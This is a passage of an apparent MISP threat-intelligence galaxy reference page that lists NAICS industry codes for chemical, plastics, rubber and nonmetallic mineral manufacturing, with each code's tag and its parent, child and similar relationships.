  • similar: misp-galaxy:naics="32513" with estimative-language:likelihood-probability="likely"

32518

Other Basic Inorganic Chemical Manufacturing

The tag is: misp-galaxy:naics="32518"

32518 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325180" with estimative-language:likelihood-probability="likely"

325180

Other Basic Inorganic Chemical Manufacturing

The tag is: misp-galaxy:naics="325180"

325180 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32518" with estimative-language:likelihood-probability="likely"

32519

Other Basic Organic Chemical Manufacturing

The tag is: misp-galaxy:naics="32519"

32519 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325193

Ethyl Alcohol Manufacturing

The tag is: misp-galaxy:naics="325193"

325193 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325194

Cyclic Crude, Intermediate, and Gum and Wood Chemical Manufacturing

The tag is: misp-galaxy:naics="325194"

325194 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

325199

All Other Basic Organic Chemical Manufacturing

The tag is: misp-galaxy:naics="325199"

325199 has relationships with:

  • child-of: misp-galaxy:naics="3251" with estimative-language:likelihood-probability="likely"

3252

Resin, Synthetic Rubber, and Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="3252"

3252 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32522" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325220" with estimative-language:likelihood-probability="likely"

32521

Resin and Synthetic Rubber Manufacturing

The tag is: misp-galaxy:naics="32521"

32521 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

325211

Plastics Material and Resin Manufacturing

The tag is: misp-galaxy:naics="325211"

325211 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

325212

Synthetic Rubber Manufacturing

The tag is: misp-galaxy:naics="325212"

325212 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

32522

Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="32522"

32522 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325220" with estimative-language:likelihood-probability="likely"

325220

Artificial and Synthetic Fibers and Filaments Manufacturing

The tag is: misp-galaxy:naics="325220"

325220 has relationships with:

  • child-of: misp-galaxy:naics="3252" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32522" with estimative-language:likelihood-probability="likely"

3253

Pesticide, Fertilizer, and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="3253"

3253 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325320" with estimative-language:likelihood-probability="likely"

32531

Fertilizer and Compost Manufacturing

The tag is: misp-galaxy:naics="32531"

32531 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325311

Nitrogenous Fertilizer Manufacturing

The tag is: misp-galaxy:naics="325311"

325311 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325312

Phosphatic Fertilizer Manufacturing

The tag is: misp-galaxy:naics="325312"

325312 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325314

Fertilizer (Mixing Only) Manufacturing

The tag is: misp-galaxy:naics="325314"

325314 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

325315

Compost Manufacturing

The tag is: misp-galaxy:naics="325315"

325315 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

32532

Pesticide and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="32532"

32532 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325320" with estimative-language:likelihood-probability="likely"

325320

Pesticide and Other Agricultural Chemical Manufacturing

The tag is: misp-galaxy:naics="325320"

325320 has relationships with:

  • child-of: misp-galaxy:naics="3253" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32532" with estimative-language:likelihood-probability="likely"

3254

Pharmaceutical and Medicine Manufacturing

The tag is: misp-galaxy:naics="3254"

3254 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325414" with estimative-language:likelihood-probability="likely"

32541

Pharmaceutical and Medicine Manufacturing

The tag is: misp-galaxy:naics="32541"

32541 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325411

Medicinal and Botanical Manufacturing

The tag is: misp-galaxy:naics="325411"

325411 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325412

Pharmaceutical Preparation Manufacturing

The tag is: misp-galaxy:naics="325412"

325412 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325413

In-Vitro Diagnostic Substance Manufacturing

The tag is: misp-galaxy:naics="325413"

325413 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

325414

Biological Product (except Diagnostic) Manufacturing

The tag is: misp-galaxy:naics="325414"

325414 has relationships with:

  • child-of: misp-galaxy:naics="3254" with estimative-language:likelihood-probability="likely"

3255

Paint, Coating, and Adhesive Manufacturing

The tag is: misp-galaxy:naics="3255"

3255 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32552" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325520" with estimative-language:likelihood-probability="likely"

32551

Paint and Coating Manufacturing

The tag is: misp-galaxy:naics="32551"

32551 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325510" with estimative-language:likelihood-probability="likely"

325510

Paint and Coating Manufacturing

The tag is: misp-galaxy:naics="325510"

325510 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32551" with estimative-language:likelihood-probability="likely"

32552

Adhesive Manufacturing

The tag is: misp-galaxy:naics="32552"

32552 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325520" with estimative-language:likelihood-probability="likely"

325520

Adhesive Manufacturing

The tag is: misp-galaxy:naics="325520"

325520 has relationships with:

  • child-of: misp-galaxy:naics="3255" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32552" with estimative-language:likelihood-probability="likely"

3256

Soap, Cleaning Compound, and Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="3256"

3256 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325620" with estimative-language:likelihood-probability="likely"

32561

Soap and Cleaning Compound Manufacturing

The tag is: misp-galaxy:naics="32561"

32561 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325611

Soap and Other Detergent Manufacturing

The tag is: misp-galaxy:naics="325611"

325611 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325612

Polish and Other Sanitation Good Manufacturing

The tag is: misp-galaxy:naics="325612"

325612 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

325613

Surface Active Agent Manufacturing

The tag is: misp-galaxy:naics="325613"

325613 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

32562

Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="32562"

32562 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325620" with estimative-language:likelihood-probability="likely"

325620

Toilet Preparation Manufacturing

The tag is: misp-galaxy:naics="325620"

325620 has relationships with:

  • child-of: misp-galaxy:naics="3256" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32562" with estimative-language:likelihood-probability="likely"

3259

Other Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="3259"

3259 has relationships with:

  • child-of: misp-galaxy:naics="325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="325998" with estimative-language:likelihood-probability="likely"

32591

Printing Ink Manufacturing

The tag is: misp-galaxy:naics="32591"

32591 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325910" with estimative-language:likelihood-probability="likely"

325910

Printing Ink Manufacturing

The tag is: misp-galaxy:naics="325910"

325910 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32591" with estimative-language:likelihood-probability="likely"

32592

Explosives Manufacturing

The tag is: misp-galaxy:naics="32592"

32592 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="325920" with estimative-language:likelihood-probability="likely"

325920

Explosives Manufacturing

The tag is: misp-galaxy:naics="325920"

325920 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32592" with estimative-language:likelihood-probability="likely"

32599

All Other Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="32599"

32599 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325991

Custom Compounding of Purchased Resins

The tag is: misp-galaxy:naics="325991"

325991 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325992

Photographic Film, Paper, Plate, Chemical, and Copy Toner Manufacturing

The tag is: misp-galaxy:naics="325992"

325992 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

325998

All Other Miscellaneous Chemical Product and Preparation Manufacturing

The tag is: misp-galaxy:naics="325998"

325998 has relationships with:

  • child-of: misp-galaxy:naics="3259" with estimative-language:likelihood-probability="likely"

326

Plastics and Rubber Products Manufacturing

The tag is: misp-galaxy:naics="326"

326 has relationships with:

  • parent-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

3261

Plastics Product Manufacturing

The tag is: misp-galaxy:naics="3261"

3261 has relationships with:

  • child-of: misp-galaxy:naics="326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326150" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32616" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326160" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32619" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326199" with estimative-language:likelihood-probability="likely"

32611

Plastics Packaging Materials and Unlaminated Film and Sheet Manufacturing

The tag is: misp-galaxy:naics="32611"

32611 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326111

Plastics Bag and Pouch Manufacturing

The tag is: misp-galaxy:naics="326111"

326111 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326112

Plastics Packaging Film and Sheet (including Laminated) Manufacturing

The tag is: misp-galaxy:naics="326112"

326112 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326113

Unlaminated Plastics Film and Sheet (except Packaging) Manufacturing

The tag is: misp-galaxy:naics="326113"

326113 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

32612

Plastics Pipe, Pipe Fitting, and Unlaminated Profile Shape Manufacturing

The tag is: misp-galaxy:naics="32612"

32612 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326121

Unlaminated Plastics Profile Shape Manufacturing

The tag is: misp-galaxy:naics="326121"

326121 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326122

Plastics Pipe and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="326122"

326122 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

32613

Laminated Plastics Plate, Sheet (except Packaging), and Shape Manufacturing

The tag is: misp-galaxy:naics="32613"

32613 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326130" with estimative-language:likelihood-probability="likely"

326130

Laminated Plastics Plate, Sheet (except Packaging), and Shape Manufacturing

The tag is: misp-galaxy:naics="326130"

326130 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32613" with estimative-language:likelihood-probability="likely"

32614

Polystyrene Foam Product Manufacturing

The tag is: misp-galaxy:naics="32614"

32614 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326140" with estimative-language:likelihood-probability="likely"

326140

Polystyrene Foam Product Manufacturing

The tag is: misp-galaxy:naics="326140"

326140 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32614" with estimative-language:likelihood-probability="likely"

32615

Urethane and Other Foam Product (except Polystyrene) Manufacturing

The tag is: misp-galaxy:naics="32615"

32615 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326150" with estimative-language:likelihood-probability="likely"

326150

Urethane and Other Foam Product (except Polystyrene) Manufacturing

The tag is: misp-galaxy:naics="326150"

326150 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32615" with estimative-language:likelihood-probability="likely"

32616

Plastics Bottle Manufacturing

The tag is: misp-galaxy:naics="32616"

32616 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326160" with estimative-language:likelihood-probability="likely"

326160

Plastics Bottle Manufacturing

The tag is: misp-galaxy:naics="326160"

326160 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32616" with estimative-language:likelihood-probability="likely"

32619

Other Plastics Product Manufacturing

The tag is: misp-galaxy:naics="32619"

32619 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326191

Plastics Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="326191"

326191 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

326199

All Other Plastics Product Manufacturing

The tag is: misp-galaxy:naics="326199"

326199 has relationships with:

  • child-of: misp-galaxy:naics="3261" with estimative-language:likelihood-probability="likely"

3262

Rubber Product Manufacturing

The tag is: misp-galaxy:naics="3262"

3262 has relationships with:

  • child-of: misp-galaxy:naics="326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32629" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="326299" with estimative-language:likelihood-probability="likely"

32621

Tire Manufacturing

The tag is: misp-galaxy:naics="32621"

32621 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326211

Tire Manufacturing (except Retreading)

The tag is: misp-galaxy:naics="326211"

326211 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326212

Tire Retreading

The tag is: misp-galaxy:naics="326212"

326212 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

32622

Rubber and Plastics Hoses and Belting Manufacturing

The tag is: misp-galaxy:naics="32622"

32622 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="326220" with estimative-language:likelihood-probability="likely"

326220

Rubber and Plastics Hoses and Belting Manufacturing

The tag is: misp-galaxy:naics="326220"

326220 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32622" with estimative-language:likelihood-probability="likely"

32629

Other Rubber Product Manufacturing

The tag is: misp-galaxy:naics="32629"

32629 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326291

Rubber Product Manufacturing for Mechanical Use

The tag is: misp-galaxy:naics="326291"

326291 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

326299

All Other Rubber Product Manufacturing

The tag is: misp-galaxy:naics="326299"

326299 has relationships with:

  • child-of: misp-galaxy:naics="3262" with estimative-language:likelihood-probability="likely"

327

Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="327"

327 has relationships with:

  • parent-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

3271

Clay Product and Refractory Manufacturing

The tag is: misp-galaxy:naics="3271"

3271 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327120" with estimative-language:likelihood-probability="likely"

32711

Pottery, Ceramics, and Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="32711"

32711 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327110" with estimative-language:likelihood-probability="likely"

327110

Pottery, Ceramics, and Plumbing Fixture Manufacturing

The tag is: misp-galaxy:naics="327110"

327110 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32711" with estimative-language:likelihood-probability="likely"

32712

Clay Building Material and Refractories Manufacturing

The tag is: misp-galaxy:naics="32712"

32712 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327120" with estimative-language:likelihood-probability="likely"

327120

Clay Building Material and Refractories Manufacturing

The tag is: misp-galaxy:naics="327120"

327120 has relationships with:

  • child-of: misp-galaxy:naics="3271" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32712" with estimative-language:likelihood-probability="likely"

3272

Glass and Glass Product Manufacturing

The tag is: misp-galaxy:naics="3272"

3272 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327215" with estimative-language:likelihood-probability="likely"

32721

Glass and Glass Product Manufacturing

The tag is: misp-galaxy:naics="32721"

32721 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327211

Flat Glass Manufacturing

The tag is: misp-galaxy:naics="327211"

327211 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327212

Other Pressed and Blown Glass and Glassware Manufacturing

The tag is: misp-galaxy:naics="327212"

327212 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327213

Glass Container Manufacturing

The tag is: misp-galaxy:naics="327213"

327213 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

327215

Glass Product Manufacturing Made of Purchased Glass

The tag is: misp-galaxy:naics="327215"

327215 has relationships with:

  • child-of: misp-galaxy:naics="3272" with estimative-language:likelihood-probability="likely"

3273

Cement and Concrete Product Manufacturing

The tag is: misp-galaxy:naics="3273"

3273 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32731" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32732" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32733" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32739" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327390" with estimative-language:likelihood-probability="likely"

32731

Cement Manufacturing

The tag is: misp-galaxy:naics="32731"

32731 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327310" with estimative-language:likelihood-probability="likely"

327310

Cement Manufacturing

The tag is: misp-galaxy:naics="327310"

327310 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32731" with estimative-language:likelihood-probability="likely"

32732

Ready-Mix Concrete Manufacturing

The tag is: misp-galaxy:naics="32732"

32732 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327320" with estimative-language:likelihood-probability="likely"

327320

Ready-Mix Concrete Manufacturing

The tag is: misp-galaxy:naics="327320"

327320 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32732" with estimative-language:likelihood-probability="likely"

32733

Concrete Pipe, Brick, and Block Manufacturing

The tag is: misp-galaxy:naics="32733"

32733 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

327331

Concrete Block and Brick Manufacturing

The tag is: misp-galaxy:naics="327331"

327331 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

327332

Concrete Pipe Manufacturing

The tag is: misp-galaxy:naics="327332"

327332 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

32739

Other Concrete Product Manufacturing

The tag is: misp-galaxy:naics="32739"

32739 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327390" with estimative-language:likelihood-probability="likely"

327390

Other Concrete Product Manufacturing

The tag is: misp-galaxy:naics="327390"

327390 has relationships with:

  • child-of: misp-galaxy:naics="3273" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32739" with estimative-language:likelihood-probability="likely"

3274

Lime and Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="3274"

3274 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32741" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32742" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327420" with estimative-language:likelihood-probability="likely"

32741

Lime Manufacturing

The tag is: misp-galaxy:naics="32741"

32741 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327410" with estimative-language:likelihood-probability="likely"

327410

Lime Manufacturing

The tag is: misp-galaxy:naics="327410"

327410 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32741" with estimative-language:likelihood-probability="likely"

32742

Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="32742"

32742 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327420" with estimative-language:likelihood-probability="likely"

327420

Gypsum Product Manufacturing

The tag is: misp-galaxy:naics="327420"

327420 has relationships with:

  • child-of: misp-galaxy:naics="3274" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32742" with estimative-language:likelihood-probability="likely"

3279

Other Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="3279"

3279 has relationships with:

  • child-of: misp-galaxy:naics="327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32791" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="32799" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="327999" with estimative-language:likelihood-probability="likely"

32791

Abrasive Product Manufacturing

The tag is: misp-galaxy:naics="32791"

32791 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="327910" with estimative-language:likelihood-probability="likely"

327910

